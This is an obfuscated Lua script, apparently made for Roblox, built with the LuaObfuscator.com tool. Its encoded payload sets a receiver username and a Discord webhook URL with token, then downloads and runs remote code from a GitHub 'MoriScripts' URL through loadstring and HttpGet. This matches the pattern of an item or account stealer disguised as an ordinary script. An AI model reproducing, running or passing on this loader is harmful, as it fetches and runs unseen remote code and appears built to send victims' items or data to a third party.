--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v71=0;local v72;while true do if (v71==0) then v72=v2(v0(v30,16));if v19 then local v95=v5(v72,v19);v19=nil;return v95;else return v72;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v73=0 -(1637 -(1523 + 114)) ;local v74;while true do if (v73==(0 -0)) then v74=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -(771 + 86 + 74)))) + (569 -(367 + (286 -85))))) ;return v74-(v74%1) ;end end else local v75=(929 -((1279 -(68 + 997)) + 713))^(v32-(1 + 0)) ;return (((v31%(v75 + v75))>=v75) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==((961 -(892 + 65)) -3)) then return v35;end if (v34==(117 -(32 + (202 -117)))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 + 0 ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * (189 + 67)) + v37 ;end if (v36==(0 -(0 + 0))) then v37,v38=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + ((1002 -(915 + 82)) -(8 -5)) ;v36=181 -(67 + 113) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 1 + 1 + 1 );v18=v18 + (4 -0) ;return (v42 * (16778403 -(1069 + 118))) + (v41 * ((264176 -115495) -(82480 + 665))) + (v40 * (559 -303)) + v39 ;end local function v24()local v43=791 -(368 + 423) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(886 -(261 + 624))) then v46=3 -2 ;v47=(v20(v45,1,38 -(10 + 8) ) * (((708 -(376 + 325)) -5)^(1112 -(1020 + 60)))) + v44 ;v43=(727 -283) -(416 + 26) ;end if (v43==(6 -4)) then v48=v20(v45,10 + 11 ,54 -23 );v49=((v20(v45,470 -(145 + 293) )==(1748 -((2338 -1578) + 987))) and  -(431 -(44 + 386))) or (1487 -(998 + 140 + 348)) ;v43=2 + 1 ;end if (v43==(0 + 0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==(11 -8)) then if (v48==(0 + 0)) then if (v47==(772 -((442 -241) + (585 -(9 + 5))))) then return v49 * (1138 -(116 + 1022)) ;else v48=1056 -(87 + (1344 -(85 + 291))) ;v46=0 -0 ;end elseif (v48==(1202 + (2110 -(243 + 1022)))) then return ((v47==(0 -(0 -0))) and (v49 * ((3 -2)/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-((1553 + 329) -(814 + 45)) ) * (v46 + (v47/((4 -2)^(3 + 49)))) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1181 -(1123 + 57)) );v18=v18 + v50 ;local v52={};for v69=1 + 0 , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(2 + 1)) then v60=nil;v61=nil;v53=4;end if (v53==(1 + 0)) then v56=nil;v57=nil;v53=2;end if (v53~=(2 + 0)) then else v58=nil;v59=nil;v53=3;end if (v53~=4) then else while true do if (v54==0) then v55=0;v56=nil;v54=1;end if (v54==2) then v59=nil;v60=nil;v54=3;end if (v54==(3 + 0)) then v61=nil;while true do if ((126 -(116 + 10))==v55) then local v102=0 + 0 ;local v103;while true do if ((738 -(542 + 196))==v102) then v103=0 -0 ;while true do if (v103~=(0 + 0)) then else local v137=0;while true do if (v137~=0) then else v56={};v57={};v137=1 + 0 ;end if (v137==(1 + 0)) then v103=2 -1 ;break;end end end if (v103~=(2 -1)) then else v58={};v55=1552 -(1126 + 425) ;break;end end break;end end end if (v55~=(407 -(118 + 287))) then else local v104=0;while true do if (v104==0) then local v108=0;while true do if (v108==(3 -2)) then v104=1;break;end if (v108==(1121 -(118 + 1003))) then for v143=2 -1 ,v60 do local v144=0;local v145;local v146;local v147;local v148;while true do if (v144==(378 -(142 + 235))) then local v168=0 -0 ;while true do if (v168==(0 + 0)) then v147=nil;v148=nil;v168=978 -(553 + 424) ;end if (v168==1) then v144=3 -1 ;break;end end end if (v144~=(0 + 0)) then else v145=0;v146=nil;v144=1;end if (v144~=(2 + 0)) then else while true do if (v145==1) then v148=nil;while true do if (v146==0) then local v178=0 + 0 ;local v179;while true do if (v178==(0 + 0)) then v179=0 + 0 ;while true do if (1==v179) then v146=1;break;end if (v179~=0) then else local v192=0;local v193;while true do if (v192~=0) then else v193=0;while true do if (0~=v193) then else v147=v21();v148=nil;v193=1;end if (v193==1) then v179=1;break;end end break;end end end end break;end end end if (v146==1) then if (v147==1) then v148=v21()~=(0 -0) ;elseif (v147==(5 -3)) then v148=v24();elseif (v147~=3) then else v148=v25();end v61[v143]=v148;break;end end break;end if (v145==(0 -0)) then local v176=0;while true do if (v176==(0 + 0)) then v146=0 -0 ;v147=nil;v176=754 -(239 + 514) ;end if ((1 + 0)==v176) then v145=1;break;end end end end break;end end end v59[1332 -(797 + 532) ]=v21();v108=1 + 0 ;end end end if (v104==1) then for v110=1 + 0 ,v23() do local v111=0 -0 ;local v112;local v113;while true do if (v111==(1202 -(373 + 829))) then local v149=0;while true do if (v149==(732 -(476 + 255))) then v111=1;break;end if (0==v149) then v112=1130 -(369 + 761) ;v113=nil;v149=1 + 0 ;end end end if (v111~=1) then else while true do if (v112~=0) then else v113=v21();if (v20(v113,1,1)~=0) then else local v171=0;local v172;local v173;local v174;local v175;while true do if (v171~=(2 -0)) then else while true do if (v172~=(3 -1)) then else local v181=238 -(64 + 174) ;local v182;local v183;while true do if (v181==(0 + 0)) then v182=0;v183=nil;v181=1 -0 ;end if (1==v181) then while true do if (v182==(336 -(144 + 192))) then v183=216 -(42 + 174) ;while true do if ((0 + 0)~=v183) then else local v196=0;while true do if (0~=v196) then else local v199=0 + 0 ;while true do if ((1 + 0)==v199) then v196=1505 -(363 + 1141) ;break;end if (v199~=(1580 -(1183 + 397))) then else if (v20(v174,2 -1 ,1 + 0 )==(1 + 0)) then v175[2]=v61[v175[1977 -(1913 + 62) ]];end if (v20(v174,2 + 0 ,5 -3 )~=(1934 -(565 + 1368))) then else v175[11 -8 ]=v61[v175[3]];end v199=1662 -(1477 + 184) ;end end end if (v196==(1 -0)) then v183=1;break;end end end if (v183==(1 + 0)) then v172=3;break;end end break;end end break;end end end if ((857 -(564 + 292))==v172) then local v184=0;local v185;while true do if (v184==(0 -0)) then v185=0 -0 ;while true do if (v185==0) then local v194=0;local v195;while true do if (v194==0) then v195=0;while true do if (v195~=0) then else local v200=304 -(244 + 60) ;while true do if (v200~=(0 + 0)) then else v175={v22(),v22(),nil,nil};if (v173==(1001 -(938 + 63))) then local v206=0 + 0 ;local v207;while true do if (v206~=(1125 -(936 + 189))) then else v207=0;while true do if (v207==0) then v175[3]=v22();v175[4]=v22();break;end end break;end end elseif (v173==1) then v175[1 + 2 ]=v23();elseif (v173==2) then v175[1616 -(1565 + 48) ]=v23() -((2 + 0)^16) ;elseif (v173==3) then local v212=1138 -(782 + 356) ;local v213;while true do if (v212==0) then v213=267 -(176 + 91) ;while true do if (v213==0) then v175[7 -4 ]=v23() -(2^16) ;v175[4]=v22();break;end end break;end end end v200=1;end if (v200==1) then v195=1 -0 ;break;end end end if (v195~=(1093 -(975 + 117))) then else v185=1876 -(157 + 1718) ;break;end end break;end end end if (v185==1) then v172=2 + 0 ;break;end end break;end end end if ((0 -0)==v172) then local v186=0 -0 ;local v187;local v188;while true do if (v186==(1018 -(697 + 321))) then v187=0 -0 ;v188=nil;v186=1 -0 ;end if (v186==(2 -1)) then while true do if (v187==(0 + 0)) then v188=0 -0 ;while true do if (v188==0) then local v197=0 -0 ;local v198;while true do if (v197~=0) then else v198=1227 -(322 + 905) ;while true do if (v198~=(611 -(602 + 9))) then else local v201=0;while true do if (v201~=1) then else v198=1190 -(449 + 740) ;break;end if (v201~=(872 -(826 + 46))) then else v173=v20(v113,949 -(245 + 702) ,9 -6 );v174=v20(v113,2 + 2 ,1904 -(260 + 1638) );v201=1;end end end if (v198==1) then v188=441 -(382 + 58) ;break;end end break;end end end if (v188==(3 -2)) then v172=1;break;end end break;end end break;end end end if (v172~=(3 + 0)) then else if (v20(v174,3,5 -2 )==(2 -1)) then v175[4]=v61[v175[1209 -(902 + 303) ]];end v56[v110]=v175;break;end end break;end if (v171==(1 -0)) then v174=nil;v175=nil;v171=4 -2 ;end if (v171~=0) then else local v177=0;while true do if (v177==(1 + 0)) then v171=1691 -(1121 + 569) ;break;end if (v177~=0) then else v172=214 -(22 + 192) ;v173=nil;v177=1;end end end end end break;end end break;end end end v55=3;break;end end end if (v55~=3) then else local v105=0;local v106;while true do if (v105==(683 -(483 + 200))) then v106=1463 -(1404 + 59) ;while true do if ((0 -0)==v106) then local v139=0;while true do if (v139==(0 -0)) then for v169=1,v23() do v57[v169-(766 -(468 + 297)) ]=v28();end return v59;end end end end break;end end end if (v55==1) then local v107=0;while true do if (v107~=0) then else local v109=562 -(334 + 228) ;while true do if (v109==0) then v59={v56,v57,nil,v58};v60=v23();v109=1 + 0 ;end if (v109==(237 -(141 + 95))) then v107=1;break;end end end if ((1 + 0)==v107) then v61={};v55=4 -2 ;break;end end end end break;end if (v54==1) then v57=nil;v58=nil;v54=2;end end break;end if (v53~=0) then else v54=0 -0 ;v55=nil;v53=1;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then local v114=v91[2];local v115=v89[v91[3]];v89[v114 + 1 ]=v115;v89[v114]=v115[v91[4]];elseif (v92>1) then local v150=v91[2];v89[v150]=v89[v150](v13(v89,v150 + 1 ,v84));else do return;end end elseif (v92<=3) then v64[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v64[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];elseif (v92==4) then local v152=v91[2];local v153,v154=v82(v89[v152](v13(v89,v152 + 1 ,v91[3])));v84=(v154 + v152) -1 ;local v155=0;for v164=v152,v84 do v155=v155 + 1 ;v89[v164]=v153[v155];end else v83=v91[3];end elseif (v92<=8) then if (v92<=6) then local v123;local v124,v125;local v126;local v127;v64[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v64[v91[3]];v83=v83 + 1 ;v91=v79[v83];v127=v91[2];v126=v89[v91[3]];v89[v127 + 1 ]=v126;v89[v127]=v126[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v127=v91[2];v124,v125=v82(v89[v127](v13(v89,v127 + 1 ,v91[3])));v84=(v125 + v127) -1 ;v123=0;for v140=v127,v84 do v123=v123 + 1 ;v89[v140]=v124[v123];end v83=v83 + 1 ;v91=v79[v83];v127=v91[2];v89[v127]=v89[v127](v13(v89,v127 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];elseif (v92==7) then v89[v91[2]]=v91[3];else v89[v91[2]]=v64[v91[3]];end elseif (v92<=10) then if (v92>9) then v89[v91[2]]();elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92==11) then v89[v91[2]]=v91[3]~=0 ;else v64[v91[3]]=v89[v91[2]];end v83=v83 + 1 ;break;end if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203103O00416E74686F6E79696C69323330343039030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135312O392O30352O3138323438353637342F7054726D2O66634775654A344B4C6D337A3656684735484756507A356B4B4D526A666C4358525439646B334E4530426630567154674B3735366B6F7972684553614A6C6D00173O0012073O00013O0026093O000E000100020004053O000E0001001207000100043O001206000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026093O0001000100010004053O00010001001207000100043O001203000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00013O00017O00",v9(),...);
